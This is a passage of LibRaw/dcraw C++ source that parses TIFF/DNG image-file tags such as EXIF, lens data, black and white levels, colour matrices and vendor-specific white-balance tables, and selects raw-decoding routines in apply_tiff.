case 280: /* Panasonic RW2 offset */
if (type != 4) break;
load_raw = &CLASS panasonic_load_raw;
load_flags = 0x2008;
case 273: /* StripOffset */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_offsets = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_offsets_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_offsets[i]=get4()+base;
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 513: /* JpegIFOffset */
case 61447:
tiff_ifd[ifd].offset = get4()+base;
if (!tiff_ifd[ifd].bps && tiff_ifd[ifd].offset > 0) {
fseek (ifp, tiff_ifd[ifd].offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
tiff_ifd[ifd].comp = 6;
tiff_ifd[ifd].t_width = jh.wide;
tiff_ifd[ifd].t_height = jh.high;
tiff_ifd[ifd].bps = jh.bits;
tiff_ifd[ifd].samples = jh.clrs;
if (!(jh.sraw || (jh.clrs & 1)))
tiff_ifd[ifd].t_width *= jh.clrs;
if ((tiff_ifd[ifd].t_width > 4*tiff_ifd[ifd].t_height) & ~jh.clrs) {
tiff_ifd[ifd].t_width /= 2;
tiff_ifd[ifd].t_height *= 2;
}
i = order;
parse_tiff (tiff_ifd[ifd].offset + 12);
order = i;
}
}
break;
case 274: /* Orientation */
tiff_ifd[ifd].t_flip = "50132467"[get2() & 7]-'0';
break;
case 277: /* SamplesPerPixel */
tiff_ifd[ifd].samples = getint(type) & 7;
break;
case 279: /* StripByteCounts */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_byte_counts = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_byte_counts_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_byte_counts[i]=get4();
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 514:
case 61448:
tiff_ifd[ifd].bytes = get4();
break;
case 61454:
FORC3 cam_mul[(4-c) % 3] = getint(type);
break;
case 305: case 11: /* Software */
fgets (software, 64, ifp);
if (!strncmp(software,"Adobe",5) ||
!strncmp(software,"dcraw",5) ||
!strncmp(software,"UFRaw",5) ||
!strncmp(software,"Bibble",6) ||
!strcmp (software,"Digital Photo Professional"))
is_raw = 0;
break;
case 306: /* DateTime */
get_timestamp(0);
break;
case 315: /* Artist */
fread (artist, 64, 1, ifp);
break;
case 317:
tiff_ifd[ifd].predictor = getint(type);
break;
case 322: /* TileWidth */
tiff_ifd[ifd].t_tile_width = getint(type);
break;
case 323: /* TileLength */
tiff_ifd[ifd].t_tile_length = getint(type);
break;
case 324: /* TileOffsets */
tiff_ifd[ifd].offset = len > 1 ? ftell(ifp) : get4();
if (len == 1)
tiff_ifd[ifd].t_tile_width = tiff_ifd[ifd].t_tile_length = 0;
if (len == 4) {
load_raw = &CLASS sinar_4shot_load_raw;
is_raw = 5;
}
break;
case 325:
tiff_ifd[ifd].bytes = len > 1 ? ftell(ifp): get4();
break;
case 330: /* SubIFDs */
if (!strcmp(model,"DSLR-A100") && tiff_ifd[ifd].t_width == 3872) {
load_raw = &CLASS sony_arw_load_raw;
data_offset = get4()+base;
ifd++;
#ifdef LIBRAW_LIBRARY_BUILD
if (ifd >= sizeof tiff_ifd / sizeof tiff_ifd[0])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
break;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make,"Hasselblad",10) && libraw_internal_data.unpacker_data.hasselblad_parser_flag) {
fseek (ifp, ftell(ifp)+4, SEEK_SET);
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
}
#endif
if(len > 1000) len=1000; /* 1000 SubIFDs is enough */
while (len--) {
i = ftell(ifp);
fseek (ifp, get4()+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
fseek (ifp, i+4, SEEK_SET);
}
break;
case 339:
tiff_ifd[ifd].sample_format = getint(type);
break;
case 400:
strcpy (make, "Sarnoff");
maximum = 0xfff;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 700:
if((type == 1 || type == 2 || type == 6 || type == 7) && len > 1 && len < 5100000)
{
xmpdata = (char*)malloc(xmplen = len+1);
fread(xmpdata,len,1,ifp);
xmpdata[len]=0;
}
break;
#endif
case 28688:
FORC4 sony_curve[c+1] = get2() >> 2 & 0xfff;
for (i=0; i < 5; i++)
for (j = sony_curve[i]+1; j <= sony_curve[i+1]; j++)
curve[j] = curve[j-1] + (1 << i);
break;
case 29184: sony_offset = get4(); break;
case 29185: sony_length = get4(); break;
case 29217: sony_key = get4(); break;
case 29264:
parse_minolta (ftell(ifp));
raw_width = 0;
break;
case 29443:
FORC4 cam_mul[c ^ (c < 2)] = get2();
break;
case 29459:
FORC4 cam_mul[c] = get2();
i = (cam_mul[1] == 1024 && cam_mul[2] == 1024) << 1;
SWAP (cam_mul[i],cam_mul[i+1])
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 30720: // Sony matrix, Sony_SR2SubIFD_0x7800
for (i=0; i < 3; i++) {
float num = 0.0;
for (c=0; c<3; c++) {
imgdata.color.ccm[i][c] = (float) ((short)get2());
num += imgdata.color.ccm[i][c];
}
if (num > 0.01) FORC3 imgdata.color.ccm[i][c] = imgdata.color.ccm[i][c] / num;
}
break;
#endif
case 29456: // Sony black level, Sony_SR2SubIFD_0x7310, no more needs to be divided by 4
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black = i;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr, _("...Sony black: %u cblack: %u %u %u %u\n"),black, cblack[0],cblack[1],cblack[2], cblack[3]);
#endif
break;
case 33405: /* Model2 */
fgets (model2, 64, ifp);
break;
case 33421: /* CFARepeatPatternDim */
if (get2() == 6 && get2() == 6)
filters = 9;
break;
case 33422: /* CFAPattern */
if (filters == 9) {
FORC(36) ((char *)xtrans)[c] = fgetc(ifp) & 3;
break;
}
case 64777: /* Kodak P-series */
if(len == 36)
{
filters = 9;
colors = 3;
FORC(36) xtrans[0][c] = fgetc(ifp) & 3;
}
else if(len > 0)
{
if ((plen=len) > 16) plen = 16;
fread (cfa_pat, 1, plen, ifp);
for (colors=cfa=i=0; i < plen && colors < 4; i++) {
colors += !(cfa & (1 << cfa_pat[i]));
cfa |= 1 << cfa_pat[i];
}
if (cfa == 070) memcpy (cfa_pc,"\003\004\005",3); /* CMY */
if (cfa == 072) memcpy (cfa_pc,"\005\003\004\001",4); /* GMCY */
goto guess_cfa_pc;
}
break;
case 33424:
case 65024:
fseek (ifp, get4()+base, SEEK_SET);
parse_kodak_ifd (base);
break;
case 33434: /* ExposureTime */
tiff_ifd[ifd].t_shutter = shutter = getreal(type);
break;
case 33437: /* FNumber */
aperture = getreal(type);
break;
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
case 0xc62f:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
// IB end
#endif
case 34306: /* Leaf white balance */
FORC4 cam_mul[c ^ 1] = 4096.0 / get2();
break;
case 34307: /* Leaf CatchLight color matrix */
fread (software, 1, 7, ifp);
if (strncmp(software,"MATRIX",6)) break;
colors = 4;
for (raw_color = i=0; i < 3; i++) {
FORC4 fscanf (ifp, "%f", &rgb_cam[i][c^1]);
if (!use_camera_wb) continue;
num = 0;
FORC4 num += rgb_cam[i][c];
FORC4 rgb_cam[i][c] /= MAX(1,num);
}
break;
case 34310: /* Leaf metadata */
parse_mos (ftell(ifp));
case 34303:
strcpy (make, "Leaf");
break;
case 34665: /* EXIF tag */
fseek (ifp, get4()+base, SEEK_SET);
parse_exif (base);
break;
case 34853: /* GPSInfo tag */
{
unsigned pos;
fseek(ifp, pos = (get4() + base), SEEK_SET);
parse_gps(base);
#ifdef LIBRAW_LIBRARY_BUILD
fseek(ifp, pos, SEEK_SET);
parse_gps_libraw(base);
#endif
}
break;
case 34675: /* InterColorProfile */
case 50831: /* AsShotICCProfile */
profile_offset = ftell(ifp);
profile_length = len;
break;
case 37122: /* CompressedBitsPerPixel */
kodak_cbpp = get4();
break;
case 37386: /* FocalLength */
focal_len = getreal(type);
break;
case 37393: /* ImageNumber */
shot_order = getint(type);
break;
case 37400: /* old Kodak KDC tag */
for (raw_color = i=0; i < 3; i++) {
getreal(type);
FORC3 rgb_cam[i][c] = getreal(type);
}
break;
case 40976:
strip_offset = get4();
switch (tiff_ifd[ifd].comp) {
case 32770: load_raw = &CLASS samsung_load_raw; break;
case 32772: load_raw = &CLASS samsung2_load_raw; break;
case 32773: load_raw = &CLASS samsung3_load_raw; break;
}
break;
case 46275: /* Imacon tags */
strcpy (make, "Imacon");
data_offset = ftell(ifp);
ima_len = len;
break;
case 46279:
if (!ima_len) break;
fseek (ifp, 38, SEEK_CUR);
case 46274:
fseek (ifp, 40, SEEK_CUR);
raw_width = get4();
raw_height = get4();
left_margin = get4() & 7;
width = raw_width - left_margin - (get4() & 7);
top_margin = get4() & 7;
height = raw_height - top_margin - (get4() & 7);
if (raw_width == 7262 && ima_len == 234317952 ) {
height = 5412;
width = 7216;
left_margin = 7;
filters=0;
} else if (raw_width == 7262) {
height = 5444;
width = 7244;
left_margin = 7;
}
fseek (ifp, 52, SEEK_CUR);
FORC3 cam_mul[c] = getreal(11);
fseek (ifp, 114, SEEK_CUR);
flip = (get2() >> 7) * 90;
if (width * height * 6 == ima_len) {
if (flip % 180 == 90) SWAP(width,height);
raw_width = width;
raw_height = height;
left_margin = top_margin = filters = flip = 0;
}
sprintf (model, "Ixpress %d-Mp", height*width/1000000);
load_raw = &CLASS imacon_full_load_raw;
if (filters) {
if (left_margin & 1) filters = 0x61616161;
load_raw = &CLASS unpacked_load_raw;
}
maximum = 0xffff;
break;
case 50454: /* Sinar tag */
case 50455:
if (len < 1 || len > 2560000 || !(cbuf = (char *) malloc(len))) break;
#ifndef LIBRAW_LIBRARY_BUILD
fread (cbuf, 1, len, ifp);
#else
if(fread (cbuf, 1, len, ifp) != len)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // cbuf to be free'ed in recycle
#endif
cbuf[len-1] = 0;
for (cp = cbuf-1; cp && cp < cbuf+len; cp = strchr(cp,'\n'))
if (!strncmp (++cp,"Neutral ",8))
sscanf (cp+8, "%f %f %f", cam_mul, cam_mul+1, cam_mul+2);
free (cbuf);
break;
case 50458:
if (!make[0]) strcpy (make, "Hasselblad");
break;
case 50459: /* Hasselblad tag */
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.hasselblad_parser_flag=1;
#endif
i = order;
j = ftell(ifp);
c = tiff_nifds;
order = get2();
fseek (ifp, j+(get2(),get4()), SEEK_SET);
parse_tiff_ifd (j);
maximum = 0xffff;
tiff_nifds = c;
order = i;
break;
case 50706: /* DNGVersion */
FORC4 dng_version = (dng_version << 8) + fgetc(ifp);
if (!make[0]) strcpy (make, "DNG");
is_raw = 1;
break;
case 50708: /* UniqueCameraModel */
#ifdef LIBRAW_LIBRARY_BUILD
stmread(imgdata.color.UniqueCameraModel, len, ifp);
imgdata.color.UniqueCameraModel[sizeof(imgdata.color.UniqueCameraModel)-1] = 0;
#endif
if (model[0]) break;
#ifndef LIBRAW_LIBRARY_BUILD
fgets (make, 64, ifp);
#else
strncpy (make, imgdata.color.UniqueCameraModel, MIN(len, sizeof(imgdata.color.UniqueCameraModel)));
#endif
if ((cp = strchr(make,' '))) {
strcpy(model,cp+1);
*cp = 0;
}
break;
case 50710: /* CFAPlaneColor */
if (filters == 9) break;
if (len > 4) len = 4;
colors = len;
fread (cfa_pc, 1, colors, ifp);
guess_cfa_pc:
FORCC tab[cfa_pc[c]] = c;
cdesc[c] = 0;
for (i=16; i--; )
filters = filters << 2 | tab[cfa_pat[i % plen]];
filters -= !filters;
break;
case 50711: /* CFALayout */
if (get2() == 2) fuji_width = 1;
break;
case 291:
case 50712: /* LinearizationTable */
linear_table (len);
break;
case 50713: /* BlackLevelRepeatDim */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4] =
#endif
cblack[4] = get2();
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[5] =
#endif
cblack[5] = get2();
if (cblack[4] * cblack[5] > (sizeof(cblack) / sizeof (cblack[0]) - 6))
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4]=
imgdata.color.dng_levels.dng_cblack[5]=
#endif
cblack[4] = cblack[5] = 1;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0xf00c: {
unsigned fwb[4];
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
if ((fwb[3] == 17) && libraw_internal_data.unpacker_data.lenRAFData>3 && libraw_internal_data.unpacker_data.lenRAFData < 10240000)
{
long long f_save = ftell(ifp);
int fj, found = 0;
ushort *rafdata = (ushort*) malloc (sizeof(ushort)*libraw_internal_data.unpacker_data.lenRAFData);
fseek (ifp, libraw_internal_data.unpacker_data.posRAFData, SEEK_SET);
fread (rafdata, sizeof(ushort), libraw_internal_data.unpacker_data.lenRAFData, ifp);
fseek(ifp, f_save, SEEK_SET);
for (int fi=0; fi<(libraw_internal_data.unpacker_data.lenRAFData-3); fi++)
{
if ((fwb[0]==rafdata[fi]) && (fwb[1]==rafdata[fi+1]) && (fwb[2]==rafdata[fi+2]))
{
if (rafdata[fi-15] != fwb[0]) continue;
fi = fi - 15;
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][3] = rafdata[fi];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = rafdata[fi+1];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = rafdata[fi+2];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = rafdata[fi+3];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = rafdata[fi+4];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = rafdata[fi+5];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = rafdata[fi+6];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = rafdata[fi+7];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = rafdata[fi+8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = rafdata[fi+9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][0] = rafdata[fi+10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][2] = rafdata[fi+11];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = rafdata[fi+12];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = rafdata[fi+13];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = rafdata[fi+14];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = rafdata[fi+15];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = rafdata[fi+16];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = rafdata[fi+17];
fi += 111;
for (fj = fi; fj<(fi+15); fj+=3)
if (rafdata[fj] != rafdata[fi])
{
found = 1;
break;
}
if (found)
{
int FujiCCT_K [31] = {2500,2550,2650,2700,2800,2850,2950,3000,3100,3200,3300,3400,3600,3700,3800,4000,4200,4300,4500,4800,5000,5300,5600,5900,6300,6700,7100,7700,8300,9100,10000};
fj = fj - 93;
for (int iCCT=0; iCCT < 31; iCCT++)
{
imgdata.color.WBCT_Coeffs[iCCT][0] = FujiCCT_K[iCCT];
imgdata.color.WBCT_Coeffs[iCCT][1] = rafdata[iCCT*3+1+fj];
imgdata.color.WBCT_Coeffs[iCCT][2] = imgdata.color.WBCT_Coeffs[iCCT][4] = rafdata[iCCT*3+fj];
imgdata.color.WBCT_Coeffs[iCCT][3] = rafdata[iCCT*3+2+fj];
}
}
free (rafdata);
break;
}
}
}
}
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
}
}
break;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
case 50709:
stmread(imgdata.color.LocalizedCameraModel,len, ifp);
break;
#endif
case 61450:
cblack[4] = cblack[5] = MIN(sqrt((double)len),64);
case 50714: /* BlackLevel */
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 && tiff_ifd[ifd].samples == len) // LinearDNG, per-channel black
{
for(i=0; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_cblack[i]=
cblack[i]=
getreal(type)+0.5;
imgdata.color.dng_levels.dng_black= black = 0;
}
else
#endif
if((cblack[4] * cblack[5] < 2) && len == 1)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black=
#endif
black =
getreal(type);
}
else if(cblack[4] * cblack[5] <= len)
{
FORC (cblack[4] * cblack[5])
cblack[6+c] = getreal(type);
black = 0;
FORC4
cblack[c] = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(tag == 50714)
{
FORC (cblack[4] * cblack[5])
imgdata.color.dng_levels.dng_cblack[6+c]= cblack[6+c];
imgdata.color.dng_levels.dng_black=0;
FORC4
imgdata.color.dng_levels.dng_cblack[c]= 0;
}
#endif
}
break;
case 50715: /* BlackLevelDeltaH */
case 50716: /* BlackLevelDeltaV */
for (num=i=0; i < len && i < 65536; i++)
num += getreal(type);
black += num/len + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black += num/len + 0.5;
#endif
break;
case 50717: /* WhiteLevel */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_whitelevel[0]=
#endif
maximum = getint(type);
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 ) // Linear DNG case
for(i=1; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_whitelevel[i]=getint(type);
#endif
break;
case 50718: /* DefaultScale */
pixel_aspect = getreal(type);
pixel_aspect /= getreal(type);
if(pixel_aspect > 0.995 && pixel_aspect < 1.005)
pixel_aspect = 1.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50778:
imgdata.color.dng_color[0].illuminant = get2();
break;
case 50779:
imgdata.color.dng_color[1].illuminant = get2();
break;
#endif
case 50721: /* ColorMatrix1 */
case 50722: /* ColorMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 50721?0:1;
#endif
FORCC for (j=0; j < 3; j++)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].colormatrix[c][j]=
#endif
cm[c][j] = getreal(type);
}
use_cm = 1;
break;
case 0xc714: /* ForwardMatrix1 */
case 0xc715: /* ForwardMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 0xc714?0:1;
#endif
for (j=0; j < 3; j++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].forwardmatrix[j][c]=
#endif
fm[j][c] = getreal(type);
}
break;
case 50723: /* CameraCalibration1 */
case 50724: /* CameraCalibration2 */
#ifdef LIBRAW_LIBRARY_BUILD
j = tag == 50723?0:1;
#endif
for (i=0; i < colors; i++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[j].calibration[i][c]=
#endif
cc[i][c] = getreal(type);
}
break;
case 50727: /* AnalogBalance */
FORCC{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.analogbalance[c]=
#endif
ab[c] = getreal(type);
}
break;
case 50728: /* AsShotNeutral */
FORCC asn[c] = getreal(type);
break;
case 50729: /* AsShotWhiteXY */
xyz[0] = getreal(type);
xyz[1] = getreal(type);
xyz[2] = 1 - xyz[0] - xyz[1];
FORC3 xyz[c] /= d65_white[c];
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50730: /* DNG: Baseline Exposure */
baseline_exposure = getreal(type);
break;
#endif
// IB start
case 50740: /* tag 0xc634 : DNG Adobe, DNG Pentax, Sony SR2, DNG Private */
#ifdef LIBRAW_LIBRARY_BUILD
{
char mbuf[64];
unsigned short makernote_found = 0;
INT64 curr_pos, start_pos = ftell(ifp);
unsigned MakN_order, m_sorder = order;
unsigned MakN_length;
unsigned pos_in_original_raw;
fread(mbuf, 1, 6, ifp);
if (!strcmp(mbuf, "Adobe"))
{
order = 0x4d4d; // Adobe header is always in "MM" / big endian
curr_pos = start_pos + 6;
while (curr_pos + 8 - start_pos <= len)
{
fread(mbuf, 1, 4, ifp);
curr_pos += 8;
if (!strncmp(mbuf, "MakN", 4)) {
makernote_found = 1;
MakN_length = get4();
MakN_order = get2();
pos_in_original_raw = get4();
order = MakN_order;
parse_makernote_0xc634(curr_pos + 6 - pos_in_original_raw, 0, AdobeDNG);
break;
}
}
}
else
{
fread(mbuf + 6, 1, 2, ifp);
if (!strcmp(mbuf, "PENTAX ") ||
!strcmp(mbuf, "SAMSUNG"))
{
makernote_found = 1;
fseek(ifp, start_pos, SEEK_SET);
parse_makernote_0xc634(base, 0, CameraDNG);
}
}
fseek(ifp, start_pos, SEEK_SET);
order = m_sorder;
}
// IB end
#endif
if (dng_version) break;
parse_minolta (j = get4()+base);
fseek (ifp, j, SEEK_SET);
parse_tiff_ifd (base);
break;
case 50752:
read_shorts (cr2_slice, 3);
break;
case 50829: /* ActiveArea */
top_margin = getint(type);
left_margin = getint(type);
height = getint(type) - top_margin;
width = getint(type) - left_margin;
break;
case 50830: /* MaskedAreas */
for (i=0; i < len && i < 32; i++)
((int*)mask)[i] = getint(type);
black = 0;
break;
case 51009: /* OpcodeList2 */
meta_offset = ftell(ifp);
break;
case 64772: /* Kodak P-series */
if (len < 13) break;
fseek (ifp, 16, SEEK_CUR);
data_offset = get4();
fseek (ifp, 28, SEEK_CUR);
data_offset += get4();
load_raw = &CLASS packed_load_raw;
break;
case 65026:
if (type == 2) fgets (model2, 64, ifp);
}
fseek (ifp, save, SEEK_SET);
}
if (sony_length && sony_length < 10240000 && (buf = (unsigned *) malloc(sony_length))) {
fseek (ifp, sony_offset, SEEK_SET);
fread (buf, sony_length, 1, ifp);
sony_decrypt (buf, sony_length/4, 1, sony_key);
#ifndef LIBRAW_LIBRARY_BUILD
sfp = ifp;
if ((ifp = tmpfile())) {
fwrite (buf, sony_length, 1, ifp);
fseek (ifp, 0, SEEK_SET);
parse_tiff_ifd (-sony_offset);
fclose (ifp);
}
ifp = sfp;
#else
if( !ifp->tempbuffer_open(buf,sony_length))
{
parse_tiff_ifd(-sony_offset);
ifp->tempbuffer_close();
}
#endif
free (buf);
}
for (i=0; i < colors; i++)
FORCC cc[i][c] *= ab[i];
if (use_cm) {
FORCC for (i=0; i < 3; i++)
for (cam_xyz[c][i]=j=0; j < colors; j++)
cam_xyz[c][i] += cc[c][j] * cm[j][i] * xyz[i];
cam_xyz_coeff (cmatrix, cam_xyz);
}
if (asn[0]) {
cam_mul[3] = 0;
FORCC cam_mul[c] = 1 / asn[c];
}
if (!use_cm)
FORCC pre_mul[c] /= cc[c][c];
return 0;
}
int CLASS parse_tiff (int base)
{
int doff;
fseek (ifp, base, SEEK_SET);
order = get2();
if (order != 0x4949 && order != 0x4d4d) return 0;
get2();
while ((doff = get4())) {
fseek (ifp, doff+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
}
return 1;
}
void CLASS apply_tiff()
{
int max_samp=0, ties=0, os, ns, raw=-1, thm=-1, i;
struct jhead jh;
thumb_misc = 16;
if (thumb_offset) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
if((unsigned)jh.bits<17 && (unsigned)jh.wide < 0x10000 && (unsigned)jh.high < 0x10000)
{
thumb_misc = jh.bits;
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
}
for (i=tiff_nifds; i--; ) {
if (tiff_ifd[i].t_shutter)
shutter = tiff_ifd[i].t_shutter;
tiff_ifd[i].t_shutter = shutter;
}
for (i=0; i < tiff_nifds; i++) {
if (max_samp < tiff_ifd[i].samples)
max_samp = tiff_ifd[i].samples;
if (max_samp > 3) max_samp = 3;
os = raw_width*raw_height;
ns = tiff_ifd[i].t_width*tiff_ifd[i].t_height;
if (tiff_bps) {
os *= tiff_bps;
ns *= tiff_ifd[i].bps;
}
if ((tiff_ifd[i].comp != 6 || tiff_ifd[i].samples != 3) &&
unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
(unsigned)tiff_ifd[i].bps < 33 && (unsigned)tiff_ifd[i].samples < 13 &&
ns && ((ns > os && (ties = 1)) ||
(ns == os && shot_select == ties++))) {
raw_width = tiff_ifd[i].t_width;
raw_height = tiff_ifd[i].t_height;
tiff_bps = tiff_ifd[i].bps;
tiff_compress = tiff_ifd[i].comp;
data_offset = tiff_ifd[i].offset;
#ifdef LIBRAW_LIBRARY_BUILD
data_size = tiff_ifd[i].bytes;
#endif
tiff_flip = tiff_ifd[i].t_flip;
tiff_samples = tiff_ifd[i].samples;
tile_width = tiff_ifd[i].t_tile_width;
tile_length = tiff_ifd[i].t_tile_length;
shutter = tiff_ifd[i].t_shutter;
raw = i;
}
}
if (is_raw == 1 && ties) is_raw = ties;
if (!tile_width ) tile_width = INT_MAX;
if (!tile_length) tile_length = INT_MAX;
for (i=tiff_nifds; i--; )
if (tiff_ifd[i].t_flip) tiff_flip = tiff_ifd[i].t_flip;
if (raw >= 0 && !load_raw)
switch (tiff_compress) {
case 32767:
if (tiff_ifd[raw].bytes == raw_width*raw_height) {
tiff_bps = 12;
load_raw = &CLASS sony_arw2_load_raw; break;
}
if (!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw; break;
}
if (tiff_ifd[raw].bytes*8 != raw_width*raw_height*tiff_bps) {
raw_height += 8;
load_raw = &CLASS sony_arw_load_raw; break;
}
load_flags = 79;
case 32769:
load_flags++;
case 32770:
case 32773: goto slr;
case 0: case 1:
#ifdef LIBRAW_LIBRARY_BUILD
// Sony 14-bit uncompressed
if(!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2)
{
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
break;
}
if(!strncasecmp(make,"Nikon",5) && !strncmp(software,"Nikon Scan",10))
{
load_raw = &CLASS nikon_coolscan_load_raw;
raw_color = 1;
filters = 0;
break;
}
#endif
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*2 == raw_width*raw_height*3)
load_flags = 24;
if (tiff_ifd[raw].bytes*5 == raw_width*raw_height*8) {
load_flags = 81;
tiff_bps = 12;
} slr:
switch (tiff_bps) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 12: if (tiff_ifd[raw].phint == 2)
load_flags = 6;
load_raw = &CLASS packed_load_raw; break;
case 14: load_flags = 0;
case 16: load_raw = &CLASS unpacked_load_raw;
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*7 > raw_width*raw_height)
load_raw = &CLASS olympus_load_raw;
}
break;
case 6: case 7: case 99:
load_raw = &CLASS lossless_jpeg_load_raw; break;
case 262:
load_raw = &CLASS kodak_262_load_raw; break;
case 34713:
if ((raw_width+9)/10*16*raw_height == tiff_ifd[raw].bytes) {
load_raw = &CLASS packed_load_raw;
load_flags = 1;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes*2) {
load_raw = &CLASS packed_load_raw;
